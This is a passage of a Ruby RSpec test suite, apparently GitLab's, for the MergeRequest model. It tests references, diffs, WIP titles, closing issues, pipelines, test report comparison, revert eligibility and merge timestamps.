it 'returns memoized value' do
subject.source_branch_sha = '2e5d3239642f9161dcbbc4b70a211a68e5e45e2b'
expect(subject.source_branch_sha).to eq '2e5d3239642f9161dcbbc4b70a211a68e5e45e2b'
end
end
describe '#to_reference' do
let(:project) { build(:project, name: 'sample-project') }
let(:merge_request) { build(:merge_request, target_project: project, iid: 1) }
it 'returns a String reference to the object' do
expect(merge_request.to_reference).to eq "!1"
end
it 'supports a cross-project reference' do
another_project = build(:project, name: 'another-project', namespace: project.namespace)
expect(merge_request.to_reference(another_project)).to eq "sample-project!1"
end
it 'returns a String reference with the full path' do
expect(merge_request.to_reference(full: true)).to eq(project.full_path + '!1')
end
end
describe '#raw_diffs' do
let(:merge_request) { build(:merge_request) }
let(:options) { { paths: ['a/b', 'b/a', 'c/*'] } }
context 'when there are MR diffs' do
it 'delegates to the MR diffs' do
merge_request.merge_request_diff = MergeRequestDiff.new
expect(merge_request.merge_request_diff).to receive(:raw_diffs).with(options)
merge_request.raw_diffs(options)
end
end
context 'when there are no MR diffs' do
it 'delegates to the compare object' do
merge_request.compare = double(:compare)
expect(merge_request.compare).to receive(:raw_diffs).with(options)
merge_request.raw_diffs(options)
end
end
end
describe '#diffs' do
let(:merge_request) { build(:merge_request) }
let(:options) { { paths: ['a/b', 'b/a', 'c/*'] } }
context 'when there are MR diffs' do
it 'delegates to the MR diffs' do
merge_request.save
expect(merge_request.merge_request_diff).to receive(:raw_diffs).with(hash_including(options)).and_call_original
merge_request.diffs(options).diff_files
end
end
context 'when there are no MR diffs' do
it 'delegates to the compare object, setting expanded: true' do
merge_request.compare = double(:compare)
expect(merge_request.compare).to receive(:diffs).with(options.merge(expanded: true))
merge_request.diffs(options)
end
end
end
describe '#preload_discussions_diff_highlight' do
let(:merge_request) { create(:merge_request) }
context 'with commit diff note' do
let(:other_merge_request) { create(:merge_request) }
let!(:diff_note) do
create(:diff_note_on_commit, project: merge_request.project)
end
let!(:other_mr_diff_note) do
create(:diff_note_on_commit, project: other_merge_request.project)
end
it 'preloads diff highlighting' do
expect_next_instance_of(Gitlab::DiscussionsDiff::FileCollection) do |collection|
note_diff_file = diff_note.note_diff_file
expect(collection)
.to receive(:load_highlight)
.with([note_diff_file.id]).and_call_original
end
merge_request.preload_discussions_diff_highlight
end
end
context 'with merge request diff note' do
let!(:unresolved_diff_note) do
create(:diff_note_on_merge_request, project: merge_request.project, noteable: merge_request)
end
let!(:resolved_diff_note) do
create(:diff_note_on_merge_request, :resolved, project: merge_request.project, noteable: merge_request)
end
it 'preloads diff highlighting' do
expect_next_instance_of(Gitlab::DiscussionsDiff::FileCollection) do |collection|
note_diff_file = unresolved_diff_note.note_diff_file
expect(collection)
.to receive(:load_highlight)
.with([note_diff_file.id])
.and_call_original
end
merge_request.preload_discussions_diff_highlight
end
end
end
describe '#diff_size' do
let(:merge_request) do
build(:merge_request, source_branch: 'expand-collapse-files', target_branch: 'master')
end
context 'when there are MR diffs' do
it 'returns the correct count' do
merge_request.save
expect(merge_request.diff_size).to eq('105')
end
it 'returns the correct overflow count' do
allow(Commit).to receive(:max_diff_options).and_return(max_files: 2)
merge_request.save
expect(merge_request.diff_size).to eq('2+')
end
it 'does not perform highlighting' do
merge_request.save
expect(Gitlab::Diff::Highlight).not_to receive(:new)
merge_request.diff_size
end
end
context 'when there are no MR diffs' do
def set_compare(merge_request)
merge_request.compare = CompareService.new(
merge_request.source_project,
merge_request.source_branch
).execute(
merge_request.target_project,
merge_request.target_branch
)
end
it 'returns the correct count' do
set_compare(merge_request)
expect(merge_request.diff_size).to eq('105')
end
it 'returns the correct overflow count' do
allow(Commit).to receive(:max_diff_options).and_return(max_files: 2)
set_compare(merge_request)
expect(merge_request.diff_size).to eq('2+')
end
it 'does not perform highlighting' do
set_compare(merge_request)
expect(Gitlab::Diff::Highlight).not_to receive(:new)
merge_request.diff_size
end
end
end
describe '#modified_paths' do
let(:paths) { double(:paths) }
subject(:merge_request) { build(:merge_request) }
before do
expect(diff).to receive(:modified_paths).and_return(paths)
end
context 'when past_merge_request_diff is specified' do
let(:another_diff) { double(:merge_request_diff) }
let(:diff) { another_diff }
it 'returns affected file paths from specified past_merge_request_diff' do
expect(merge_request.modified_paths(past_merge_request_diff: another_diff)).to eq(paths)
end
end
context 'when compare is present' do
let(:compare) { double(:compare) }
let(:diff) { compare }
it 'returns affected file paths from compare' do
merge_request.compare = compare
expect(merge_request.modified_paths).to eq(paths)
end
end
context 'when no arguments provided' do
let(:diff) { merge_request.merge_request_diff }
subject(:merge_request) { create(:merge_request, source_branch: 'feature', target_branch: 'master') }
it 'returns affected file paths for merge_request_diff' do
expect(merge_request.modified_paths).to eq(paths)
end
end
end
describe "#related_notes" do
let!(:merge_request) { create(:merge_request) }
before do
allow(merge_request).to receive(:commits) { [merge_request.source_project.repository.commit] }
create(:note_on_commit, commit_id: merge_request.commits.first.id,
project: merge_request.project)
create(:note, noteable: merge_request, project: merge_request.project)
end
it "includes notes for commits" do
expect(merge_request.commits).not_to be_empty
expect(merge_request.related_notes.count).to eq(2)
end
it "includes notes for commits from target project as well" do
create(:note_on_commit, commit_id: merge_request.commits.first.id,
project: merge_request.target_project)
expect(merge_request.commits).not_to be_empty
expect(merge_request.related_notes.count).to eq(3)
end
it "excludes system notes for commits" do
system_note = create(:note_on_commit, :system, commit_id: merge_request.commits.first.id,
project: merge_request.project)
expect(merge_request.related_notes.count).to eq(2)
expect(merge_request.related_notes).not_to include(system_note)
end
end
describe '#for_fork?' do
it 'returns true if the merge request is for a fork' do
subject.source_project = build_stubbed(:project, namespace: create(:group))
subject.target_project = build_stubbed(:project, namespace: create(:group))
expect(subject.for_fork?).to be_truthy
end
it 'returns false if is not for a fork' do
expect(subject.for_fork?).to be_falsey
end
end
describe '#closes_issues' do
let(:issue0) { create :issue, project: subject.project }
let(:issue1) { create :issue, project: subject.project }
let(:commit0) { double('commit0', safe_message: "Fixes #{issue0.to_reference}") }
let(:commit1) { double('commit1', safe_message: "Fixes #{issue0.to_reference}") }
let(:commit2) { double('commit2', safe_message: "Fixes #{issue1.to_reference}") }
before do
subject.project.add_developer(subject.author)
allow(subject).to receive(:commits).and_return([commit0, commit1, commit2])
end
it 'accesses the set of issues that will be closed on acceptance' do
allow(subject.project).to receive(:default_branch)
.and_return(subject.target_branch)
closed = subject.closes_issues
expect(closed).to include(issue0, issue1)
end
    it 'only lists issues to be closed if the MR targets the default branch' do
allow(subject.project).to receive(:default_branch).and_return('master')
subject.target_branch = 'something-else'
expect(subject.closes_issues).to be_empty
end
end
describe '#issues_mentioned_but_not_closing' do
let(:closing_issue) { create :issue, project: subject.project }
let(:mentioned_issue) { create :issue, project: subject.project }
let(:commit) { double('commit', safe_message: "Fixes #{closing_issue.to_reference}") }
it 'detects issues mentioned in description but not closed' do
subject.project.add_developer(subject.author)
subject.description = "Is related to #{mentioned_issue.to_reference} and #{closing_issue.to_reference}"
allow(subject).to receive(:commits).and_return([commit])
allow(subject.project).to receive(:default_branch)
.and_return(subject.target_branch)
subject.cache_merge_request_closes_issues!
expect(subject.issues_mentioned_but_not_closing(subject.author)).to match_array([mentioned_issue])
end
context 'when the project has an external issue tracker' do
before do
subject.project.add_developer(subject.author)
commit = double(:commit, safe_message: 'Fixes TEST-3')
create(:jira_service, project: subject.project)
allow(subject).to receive(:commits).and_return([commit])
allow(subject).to receive(:description).and_return('Is related to TEST-2 and TEST-3')
allow(subject.project).to receive(:default_branch).and_return(subject.target_branch)
end
it 'detects issues mentioned in description but not closed' do
subject.cache_merge_request_closes_issues!
expect(subject.issues_mentioned_but_not_closing(subject.author).map(&:to_s)).to match_array(['TEST-2'])
end
end
end
describe "#work_in_progress?" do
['WIP ', 'WIP:', 'WIP: ', '[WIP]', '[WIP] ', ' [WIP] WIP [WIP] WIP: WIP '].each do |wip_prefix|
it "detects the '#{wip_prefix}' prefix" do
subject.title = "#{wip_prefix}#{subject.title}"
expect(subject.work_in_progress?).to eq true
end
end
it "doesn't detect WIP for words starting with WIP" do
subject.title = "Wipwap #{subject.title}"
expect(subject.work_in_progress?).to eq false
end
it "doesn't detect WIP for words containing with WIP" do
subject.title = "WupWipwap #{subject.title}"
expect(subject.work_in_progress?).to eq false
end
it "doesn't detect WIP by default" do
expect(subject.work_in_progress?).to eq false
end
end
describe "#wipless_title" do
['WIP ', 'WIP:', 'WIP: ', '[WIP]', '[WIP] ', '[WIP] WIP [WIP] WIP: WIP '].each do |wip_prefix|
it "removes the '#{wip_prefix}' prefix" do
wipless_title = subject.title
subject.title = "#{wip_prefix}#{subject.title}"
expect(subject.wipless_title).to eq wipless_title
end
it "is satisfies the #work_in_progress? method" do
subject.title = "#{wip_prefix}#{subject.title}"
subject.title = subject.wipless_title
expect(subject.work_in_progress?).to eq false
end
end
end
describe "#wip_title" do
it "adds the WIP: prefix to the title" do
wip_title = "WIP: #{subject.title}"
expect(subject.wip_title).to eq wip_title
end
it "does not add the WIP: prefix multiple times" do
wip_title = "WIP: #{subject.title}"
subject.title = subject.wip_title
subject.title = subject.wip_title
expect(subject.wip_title).to eq wip_title
end
it "is satisfies the #work_in_progress? method" do
subject.title = subject.wip_title
expect(subject.work_in_progress?).to eq true
end
end
describe '#can_remove_source_branch?' do
set(:user) { create(:user) }
set(:merge_request) { create(:merge_request, :simple) }
subject { merge_request }
before do
subject.source_project.add_maintainer(user)
end
it "can't be removed when its a protected branch" do
allow(ProtectedBranch).to receive(:protected?).and_return(true)
expect(subject.can_remove_source_branch?(user)).to be_falsey
end
it "can't remove a root ref" do
subject.update(source_branch: 'master', target_branch: 'feature')
expect(subject.can_remove_source_branch?(user)).to be_falsey
end
it "is unable to remove the source branch for a project the user cannot push to" do
user2 = create(:user)
expect(subject.can_remove_source_branch?(user2)).to be_falsey
end
it "can be removed if the last commit is the head of the source branch" do
allow(subject).to receive(:source_branch_head).and_return(subject.diff_head_commit)
expect(subject.can_remove_source_branch?(user)).to be_truthy
end
it "cannot be removed if the last commit is not also the head of the source branch" do
subject.clear_memoized_shas
subject.source_branch = "lfs"
expect(subject.can_remove_source_branch?(user)).to be_falsey
end
end
describe '#default_merge_commit_message' do
it 'includes merge information as the title' do
request = build(:merge_request, source_branch: 'source', target_branch: 'target')
expect(request.default_merge_commit_message)
.to match("Merge branch 'source' into 'target'\n\n")
end
it 'includes its title in the body' do
request = build(:merge_request, title: 'Remove all technical debt')
expect(request.default_merge_commit_message)
.to match("Remove all technical debt\n\n")
end
it 'includes its closed issues in the body' do
issue = create(:issue, project: subject.project)
subject.project.add_developer(subject.author)
subject.description = "This issue Closes #{issue.to_reference}"
allow(subject.project).to receive(:default_branch).and_return(subject.target_branch)
subject.cache_merge_request_closes_issues!
expect(subject.default_merge_commit_message)
.to match("Closes #{issue.to_reference}")
end
it 'includes its reference in the body' do
request = build_stubbed(:merge_request)
expect(request.default_merge_commit_message)
.to match("See merge request #{request.to_reference(full: true)}")
end
it 'excludes multiple linebreak runs when description is blank' do
request = build(:merge_request, title: 'Title', description: nil)
expect(request.default_merge_commit_message).not_to match("Title\n\n\n\n")
end
it 'includes its description in the body' do
request = build(:merge_request, description: 'By removing all code')
expect(request.default_merge_commit_message(include_description: true))
.to match("By removing all code\n\n")
end
    it 'does not include its description in the body' do
request = build(:merge_request, description: 'By removing all code')
expect(request.default_merge_commit_message)
.not_to match("By removing all code\n\n")
end
end
describe "#auto_merge_strategy" do
subject { merge_request.auto_merge_strategy }
let(:merge_request) { create(:merge_request, :merge_when_pipeline_succeeds) }
it { is_expected.to eq('merge_when_pipeline_succeeds') }
context 'when auto merge is disabled' do
let(:merge_request) { create(:merge_request) }
it { is_expected.to be_nil }
end
end
describe '#committers' do
it 'returns all the committers of every commit in the merge request' do
users = subject.commits.without_merge_commits.map(&:committer_email).uniq.map do |email|
create(:user, email: email)
end
expect(subject.committers).to match_array(users)
end
it 'returns an empty array if no committer is associated with a user' do
expect(subject.committers).to be_empty
end
end
describe '#hook_attrs' do
it 'delegates to Gitlab::HookData::MergeRequestBuilder#build' do
builder = double
expect(Gitlab::HookData::MergeRequestBuilder)
.to receive(:new).with(subject).and_return(builder)
expect(builder).to receive(:build)
subject.hook_attrs
end
end
describe '#diverged_commits_count' do
let(:project) { create(:project, :repository) }
let(:forked_project) { fork_project(project, nil, repository: true) }
context 'when the target branch does not exist anymore' do
subject { create(:merge_request, source_project: project, target_project: project) }
before do
project.repository.raw_repository.delete_branch(subject.target_branch)
subject.clear_memoized_shas
end
it 'does not crash' do
expect { subject.diverged_commits_count }.not_to raise_error
end
it 'returns 0' do
expect(subject.diverged_commits_count).to eq(0)
end
end
context 'diverged on same repository' do
subject(:merge_request_with_divergence) { create(:merge_request, :diverged, source_project: project, target_project: project) }
it 'counts commits that are on target branch but not on source branch' do
expect(subject.diverged_commits_count).to eq(29)
end
end
context 'diverged on fork' do
subject(:merge_request_fork_with_divergence) { create(:merge_request, :diverged, source_project: forked_project, target_project: project) }
it 'counts commits that are on target branch but not on source branch' do
expect(subject.diverged_commits_count).to eq(29)
end
end
context 'rebased on fork' do
subject(:merge_request_rebased) { create(:merge_request, :rebased, source_project: forked_project, target_project: project) }
it 'counts commits that are on target branch but not on source branch' do
expect(subject.diverged_commits_count).to eq(0)
end
end
describe 'caching' do
before do
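        # use a real in-memory store so diverged_commits_count can actually
        # write to and read from Rails.cache in these examples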
allow(Rails).to receive(:cache).and_return(ActiveSupport::Cache::MemoryStore.new)
end
it 'caches the output' do
expect(subject).to receive(:compute_diverged_commits_count)
.once
.and_return(2)
subject.diverged_commits_count
subject.diverged_commits_count
end
it 'invalidates the cache when the source sha changes' do
expect(subject).to receive(:compute_diverged_commits_count)
.twice
.and_return(2)
subject.diverged_commits_count
allow(subject).to receive(:source_branch_sha).and_return('123abc')
subject.diverged_commits_count
end
it 'invalidates the cache when the target sha changes' do
expect(subject).to receive(:compute_diverged_commits_count)
.twice
.and_return(2)
subject.diverged_commits_count
allow(subject).to receive(:target_branch_sha).and_return('123abc')
subject.diverged_commits_count
end
end
end
it_behaves_like 'an editable mentionable' do
subject { create(:merge_request, :simple) }
let(:backref_text) { "merge request #{subject.to_reference}" }
let(:set_mentionable_text) { ->(txt) { subject.description = txt } }
end
it_behaves_like 'a Taskable' do
subject { create :merge_request, :simple }
end
describe '#commit_shas' do
before do
allow(subject.merge_request_diff).to receive(:commit_shas)
.and_return(['sha1'])
end
it 'delegates to merge request diff' do
expect(subject.commit_shas).to eq ['sha1']
end
end
context 'head pipeline' do
let(:diff_head_sha) { Digest::SHA1.hexdigest(SecureRandom.hex) }
before do
allow(subject).to receive(:diff_head_sha).and_return(diff_head_sha)
end
describe '#head_pipeline' do
it 'returns nil for MR without head_pipeline_id' do
subject.update_attribute(:head_pipeline_id, nil)
expect(subject.head_pipeline).to be_nil
end
context 'when the source project does not exist' do
it 'returns nil' do
allow(subject).to receive(:source_project).and_return(nil)
expect(subject.head_pipeline).to be_nil
end
end
end
describe '#actual_head_pipeline' do
it 'returns nil for MR with old pipeline' do
pipeline = create(:ci_empty_pipeline, sha: 'notlatestsha')
subject.update_attribute(:head_pipeline_id, pipeline.id)
expect(subject.actual_head_pipeline).to be_nil
end
it 'returns the pipeline for MR with recent pipeline' do
pipeline = create(:ci_empty_pipeline, sha: diff_head_sha)
subject.update_attribute(:head_pipeline_id, pipeline.id)
expect(subject.actual_head_pipeline).to eq(subject.head_pipeline)
expect(subject.actual_head_pipeline).to eq(pipeline)
end
it 'returns the pipeline for MR with recent merge request pipeline' do
pipeline = create(:ci_empty_pipeline, sha: 'merge-sha', source_sha: diff_head_sha)
subject.update_attribute(:head_pipeline_id, pipeline.id)
expect(subject.actual_head_pipeline).to eq(subject.head_pipeline)
expect(subject.actual_head_pipeline).to eq(pipeline)
end
it 'returns nil when source project does not exist' do
allow(subject).to receive(:source_project).and_return(nil)
expect(subject.actual_head_pipeline).to be_nil
end
end
end
describe '#merge_pipeline' do
it 'returns nil when not merged' do
expect(subject.merge_pipeline).to be_nil
end
context 'when the MR is merged' do
let(:sha) { subject.target_project.commit.id }
let(:pipeline) { create(:ci_empty_pipeline, sha: sha, ref: subject.target_branch, project: subject.target_project) }
before do
subject.mark_as_merged!
subject.update_attribute(:merge_commit_sha, pipeline.sha)
end
it 'returns the post-merge pipeline' do
expect(subject.merge_pipeline).to eq(pipeline)
end
end
end
describe '#has_ci?' do
let(:merge_request) { build_stubbed(:merge_request) }
context 'has ci' do
it 'returns true if MR has head_pipeline_id and commits' do
allow(merge_request).to receive_message_chain(:source_project, :ci_service) { nil }
allow(merge_request).to receive(:head_pipeline_id) { double }
allow(merge_request).to receive(:has_no_commits?) { false }
expect(merge_request.has_ci?).to be(true)
end
it 'returns true if MR has any pipeline and commits' do
allow(merge_request).to receive_message_chain(:source_project, :ci_service) { nil }
allow(merge_request).to receive(:head_pipeline_id) { nil }
allow(merge_request).to receive(:has_no_commits?) { false }
allow(merge_request).to receive(:all_pipelines) { [double] }
expect(merge_request.has_ci?).to be(true)
end
it 'returns true if MR has CI service and commits' do
allow(merge_request).to receive_message_chain(:source_project, :ci_service) { double }
allow(merge_request).to receive(:head_pipeline_id) { nil }
allow(merge_request).to receive(:has_no_commits?) { false }
allow(merge_request).to receive(:all_pipelines) { [] }
expect(merge_request.has_ci?).to be(true)
end
end
context 'has no ci' do
it 'returns false if MR has no CI service nor pipeline, and no commits' do
allow(merge_request).to receive_message_chain(:source_project, :ci_service) { nil }
allow(merge_request).to receive(:head_pipeline_id) { nil }
allow(merge_request).to receive(:all_pipelines) { [] }
allow(merge_request).to receive(:has_no_commits?) { true }
expect(merge_request.has_ci?).to be(false)
end
end
end
describe '#all_pipelines' do
shared_examples 'returning pipelines with proper ordering' do
let!(:all_pipelines) do
subject.all_commit_shas.map do |sha|
create(:ci_empty_pipeline,
project: subject.source_project,
sha: sha,
ref: subject.source_branch)
end
end
it 'returns all pipelines' do
expect(subject.all_pipelines).not_to be_empty
expect(subject.all_pipelines).to eq(all_pipelines.reverse)
end
end
context 'with single merge_request_diffs' do
it_behaves_like 'returning pipelines with proper ordering'
end
context 'with multiple irrelevant merge_request_diffs' do
before do
subject.update(target_branch: 'v1.0.0')
end
it_behaves_like 'returning pipelines with proper ordering'
end
context 'with unsaved merge request' do
subject { build(:merge_request) }
let!(:pipeline) do
create(:ci_empty_pipeline,
project: subject.project,
sha: subject.diff_head_sha,
ref: subject.source_branch)
end
it 'returns pipelines from diff_head_sha' do
expect(subject.all_pipelines).to contain_exactly(pipeline)
end
end
context 'when pipelines exist for the branch and merge request' do
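      # both a plain branch (push) pipeline and a detached merge request
      # pipeline exist for the same commits; MR pipelines are expected to
      # sort ahead of the branch pipelines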
let(:source_ref) { 'feature' }
let(:target_ref) { 'master' }
let!(:branch_pipeline) do
create(:ci_pipeline,
source: :push,
project: project,
ref: source_ref,
sha: shas.second)
end
let!(:detached_merge_request_pipeline) do
create(:ci_pipeline,
source: :merge_request_event,
project: project,
ref: source_ref,
sha: shas.second,
merge_request: merge_request)
end
let(:merge_request) do
create(:merge_request,
source_project: project,
source_branch: source_ref,
target_project: project,
target_branch: target_ref)
end
let(:project) { create(:project, :repository) }
let(:shas) { project.repository.commits(source_ref, limit: 2).map(&:id) }
before do
allow(merge_request).to receive(:all_commit_shas) { shas }
end
it 'returns merge request pipeline first' do
expect(merge_request.all_pipelines)
.to eq([detached_merge_request_pipeline,
branch_pipeline])
end
context 'when there are a branch pipeline and a merge request pipeline' do
let!(:branch_pipeline_2) do
create(:ci_pipeline,
source: :push,
project: project,
ref: source_ref,
sha: shas.first)
end
let!(:detached_merge_request_pipeline_2) do
create(:ci_pipeline,
source: :merge_request_event,
project: project,
ref: source_ref,
sha: shas.first,
merge_request: merge_request)
end
it 'returns merge request pipelines first' do
expect(merge_request.all_pipelines)
.to eq([detached_merge_request_pipeline_2,
detached_merge_request_pipeline,
branch_pipeline_2,
branch_pipeline])
end
end
context 'when there are multiple merge request pipelines from the same branch' do
let!(:branch_pipeline_2) do
create(:ci_pipeline,
source: :push,
project: project,
ref: source_ref,
sha: shas.first)
end
let!(:detached_merge_request_pipeline_2) do
create(:ci_pipeline,
source: :merge_request_event,
project: project,
ref: source_ref,
sha: shas.first,
merge_request: merge_request_2)
end
let(:merge_request_2) do
create(:merge_request,
source_project: project,
source_branch: source_ref,
target_project: project,
target_branch: 'stable')
end
before do
allow(merge_request_2).to receive(:all_commit_shas) { shas }
end
it 'returns only related merge request pipelines' do
expect(merge_request.all_pipelines)
.to eq([detached_merge_request_pipeline,
branch_pipeline_2,
branch_pipeline])
expect(merge_request_2.all_pipelines)
.to eq([detached_merge_request_pipeline_2,
branch_pipeline_2,
branch_pipeline])
end
end
context 'when detached merge request pipeline is run on head ref of the merge request' do
let!(:detached_merge_request_pipeline) do
create(:ci_pipeline,
source: :merge_request_event,
project: project,
ref: merge_request.ref_path,
sha: shas.second,
merge_request: merge_request)
end
it 'sets the head ref of the merge request to the pipeline ref' do
expect(detached_merge_request_pipeline.ref).to match(%r{refs/merge-requests/\d+/head})
end
        it 'includes the detached merge request pipeline even though the ref is a custom path' do
expect(merge_request.all_pipelines).to include(detached_merge_request_pipeline)
end
end
end
end
describe '#update_head_pipeline' do
subject { merge_request.update_head_pipeline }
let(:merge_request) { create(:merge_request) }
context 'when there is a pipeline with the diff head sha' do
let!(:pipeline) do
create(:ci_empty_pipeline,
project: merge_request.project,
sha: merge_request.diff_head_sha,
ref: merge_request.source_branch)
end
it 'updates the head pipeline' do
expect { subject }
.to change { merge_request.reload.head_pipeline }
.from(nil).to(pipeline)
end
context 'when merge request has already had head pipeline' do
before do
merge_request.update!(head_pipeline: pipeline)
end
context 'when failed to find an actual head pipeline' do
before do
allow(merge_request).to receive(:find_actual_head_pipeline) { }
end
it 'does not update the current head pipeline' do
expect { subject }
.not_to change { merge_request.reload.head_pipeline }
end
end
end
end
context 'when detached merge request pipeline is run on head ref of the merge request' do
let!(:pipeline) do
create(:ci_pipeline,
source: :merge_request_event,
project: merge_request.source_project,
ref: merge_request.ref_path,
sha: sha,
merge_request: merge_request)
end
let(:sha) { merge_request.diff_head_sha }
it 'sets the head ref of the merge request to the pipeline ref' do
expect(pipeline.ref).to match(%r{refs/merge-requests/\d+/head})
end
it 'updates correctly even though the target branch name of the merge request is different from the pipeline ref' do
expect { subject }
.to change { merge_request.reload.head_pipeline }
.from(nil).to(pipeline)
end
context 'when sha is not HEAD of the source branch' do
let(:sha) { merge_request.diff_base_sha }
it 'does not update head pipeline' do
expect { subject }.not_to change { merge_request.reload.head_pipeline }
end
end
end
context 'when there are no pipelines with the diff head sha' do
it 'does not update the head pipeline' do
expect { subject }
.not_to change { merge_request.reload.head_pipeline }
end
end
end
describe '#has_test_reports?' do
subject { merge_request.has_test_reports? }
let(:project) { create(:project, :repository) }
context 'when head pipeline has test reports' do
let(:merge_request) { create(:merge_request, :with_test_reports, source_project: project) }
it { is_expected.to be_truthy }
end
context 'when head pipeline does not have test reports' do
let(:merge_request) { create(:merge_request, source_project: project) }
it { is_expected.to be_falsey }
end
end
describe '#calculate_reactive_cache' do
let(:project) { create(:project, :repository) }
let(:merge_request) { create(:merge_request, source_project: project) }
subject { merge_request.calculate_reactive_cache(service_class_name) }
context 'when given an unknown service class name' do
let(:service_class_name) { 'Integer' }
it 'raises a NameError exception' do
expect { subject }.to raise_error(NameError, service_class_name)
end
end
context 'when given a known service class name' do
let(:service_class_name) { 'Ci::CompareTestReportsService' }
      it 'does not raise a NameError exception' do
allow_any_instance_of(service_class_name.constantize).to receive(:execute).and_return(nil)
expect { subject }.not_to raise_error
end
end
end
describe '#compare_test_reports' do
subject { merge_request.compare_test_reports }
let(:project) { create(:project, :repository) }
let(:merge_request) { create(:merge_request, source_project: project) }
let!(:base_pipeline) do
create(:ci_pipeline,
:with_test_reports,
project: project,
ref: merge_request.target_branch,
sha: merge_request.diff_base_sha)
end
before do
merge_request.update!(head_pipeline_id: head_pipeline.id)
end
context 'when head pipeline has test reports' do
let!(:head_pipeline) do
create(:ci_pipeline,
:with_test_reports,
project: project,
ref: merge_request.source_branch,
sha: merge_request.diff_head_sha)
end
context 'when reactive cache worker is parsing asynchronously' do
it 'returns status' do
expect(subject[:status]).to eq(:parsing)
end
end
context 'when reactive cache worker is inline' do
before do
synchronous_reactive_cache(merge_request)
end
it 'returns status and data' do
expect_any_instance_of(Ci::CompareTestReportsService)
.to receive(:execute).with(base_pipeline, head_pipeline).and_call_original
subject
end
context 'when cached results is not latest' do
before do
allow_any_instance_of(Ci::CompareTestReportsService)
.to receive(:latest?).and_return(false)
end
          it 'raises an InvalidateReactiveCache error' do
expect { subject }.to raise_error(ReactiveCaching::InvalidateReactiveCache)
end
end
end
end
context 'when head pipeline does not have test reports' do
let!(:head_pipeline) do
create(:ci_pipeline,
project: project,
ref: merge_request.source_branch,
sha: merge_request.diff_head_sha)
end
it 'returns status and error message' do
expect(subject[:status]).to eq(:error)
expect(subject[:status_reason]).to eq('This merge request does not have test reports')
end
end
end
describe '#all_commit_shas' do
context 'when merge request is persisted' do
let(:all_commit_shas) do
subject.merge_request_diffs.flat_map(&:commits).map(&:sha).uniq
end
shared_examples 'returning all SHA' do
it 'returns all SHAs from all merge_request_diffs' do
expect(subject.merge_request_diffs.size).to eq(2)
expect(subject.all_commit_shas).to match_array(all_commit_shas)
end
end
context 'with a completely different branch' do
before do
subject.update(target_branch: 'csv')
end
it_behaves_like 'returning all SHA'
end
context 'with a branch having no difference' do
before do
subject.update(target_branch: 'branch-merged')
subject.reload # make sure commits were not cached
end
it_behaves_like 'returning all SHA'
end
end
context 'when merge request is not persisted' do
context 'when compare commits are set in the service' do
let(:commit) { spy('commit') }
subject do
build(:merge_request, compare_commits: [commit, commit])
end
it 'returns commits from compare commits temporary data' do
expect(subject.all_commit_shas).to eq [commit, commit]
end
end
context 'when compare commits are not set in the service' do
subject { build(:merge_request) }
it 'returns array with diff head sha element only' do
expect(subject.all_commit_shas).to eq [subject.diff_head_sha]
end
end
end
end
describe '#short_merge_commit_sha' do
let(:merge_request) { build_stubbed(:merge_request) }
it 'returns short id when there is a merge_commit_sha' do
merge_request.merge_commit_sha = 'f7ce827c314c9340b075657fd61c789fb01cf74d'
expect(merge_request.short_merge_commit_sha).to eq('f7ce827c')
end
it 'returns nil when there is no merge_commit_sha' do
merge_request.merge_commit_sha = nil
expect(merge_request.short_merge_commit_sha).to be_nil
end
end
describe '#can_be_reverted?' do
context 'when there is no merge_commit for the MR' do
before do
subject.metrics.update!(merged_at: Time.now.utc)
end
it 'returns false' do
expect(subject.can_be_reverted?(nil)).to be_falsey
end
end
context 'when the MR has been merged' do
before do
MergeRequests::MergeService
.new(subject.target_project, subject.author)
.execute(subject)
end
context 'when there is no revert commit' do
it 'returns true' do
expect(subject.can_be_reverted?(nil)).to be_truthy
end
end
context 'when there is no merged_at for the MR' do
before do
subject.metrics.update!(merged_at: nil)
end
it 'returns true' do
expect(subject.can_be_reverted?(nil)).to be_truthy
end
end
context 'when there is a revert commit' do
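        # RevertService creates the revert commit; ProcessCommitWorker then
        # leaves the cross-reference system note whose timestamp is compared
        # against merged_at by #can_be_reverted?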
let(:current_user) { subject.author }
let(:branch) { subject.target_branch }
let(:project) { subject.target_project }
let(:revert_commit_id) do
params = {
commit: subject.merge_commit,
branch_name: branch,
start_branch: branch
}
Commits::RevertService.new(project, current_user, params).execute[:result]
end
before do
project.add_maintainer(current_user)
ProcessCommitWorker.new.perform(project.id,
current_user.id,
project.commit(revert_commit_id).to_hash,
project.default_branch == branch)
end
context 'but merged at timestamp cannot be found' do
before do
allow(subject).to receive(:merged_at) { nil }
end
it 'returns false' do
expect(subject.can_be_reverted?(current_user)).to be_falsey
end
end
context 'when the revert commit is mentioned in a note after the MR was merged' do
it 'returns false' do
expect(subject.can_be_reverted?(current_user)).to be_falsey
end
end
context 'when there is no merged_at for the MR' do
before do
subject.metrics.update!(merged_at: nil)
end
it 'returns false' do
expect(subject.can_be_reverted?(current_user)).to be_falsey
end
end
context 'when the revert commit is mentioned in a note just before the MR was merged' do
before do
subject.notes.last.update!(created_at: subject.metrics.merged_at - 30.seconds)
end
it 'returns false' do
expect(subject.can_be_reverted?(current_user)).to be_falsey
end
end
context 'when the revert commit is mentioned in a note long before the MR was merged' do
before do
subject.notes.last.update!(created_at: subject.metrics.merged_at - 2.minutes)
end
it 'returns true' do
expect(subject.can_be_reverted?(current_user)).to be_truthy
end
end
end
end
end
describe '#merged_at' do
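    # merged_at falls back through several sources: metrics.merged_at, then
    # the merge event's created_at, then the state-change system note's
    # created_at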
context 'when MR is not merged' do
let(:merge_request) { create(:merge_request, :closed) }
it 'returns nil' do
expect(merge_request.merged_at).to be_nil
end
end
context 'when metrics has merged_at data' do
let(:merge_request) { create(:merge_request, :merged) }
before do
merge_request.metrics.update!(merged_at: 1.day.ago)
end
it 'returns metrics merged_at' do
expect(merge_request.merged_at).to eq(merge_request.metrics.merged_at)
end
end
context 'when merged event is persisted, but no metrics merged_at is persisted' do
let(:user) { create(:user) }
let(:merge_request) { create(:merge_request, :merged) }
before do
EventCreateService.new.merge_mr(merge_request, user)
end
it 'returns merged event creation date' do
expect(merge_request.merge_event).to be_persisted
expect(merge_request.merged_at).to eq(merge_request.merge_event.created_at)
end
end
context 'when merging note is persisted, but no metrics or merge event exists' do
let(:user) { create(:user) }
let(:merge_request) { create(:merge_request, :merged) }
before do
merge_request.metrics.destroy!
SystemNoteService.change_status(merge_request,
merge_request.target_project,
user,
merge_request.state, nil)
end
it 'returns merging note creation date' do
expect(merge_request.reload.metrics).to be_nil
expect(merge_request.merge_event).to be_nil
expect(merge_request.notes.count).to eq(1)
expect(merge_request.merged_at).to eq(merge_request.notes.first.created_at)
end
end
end
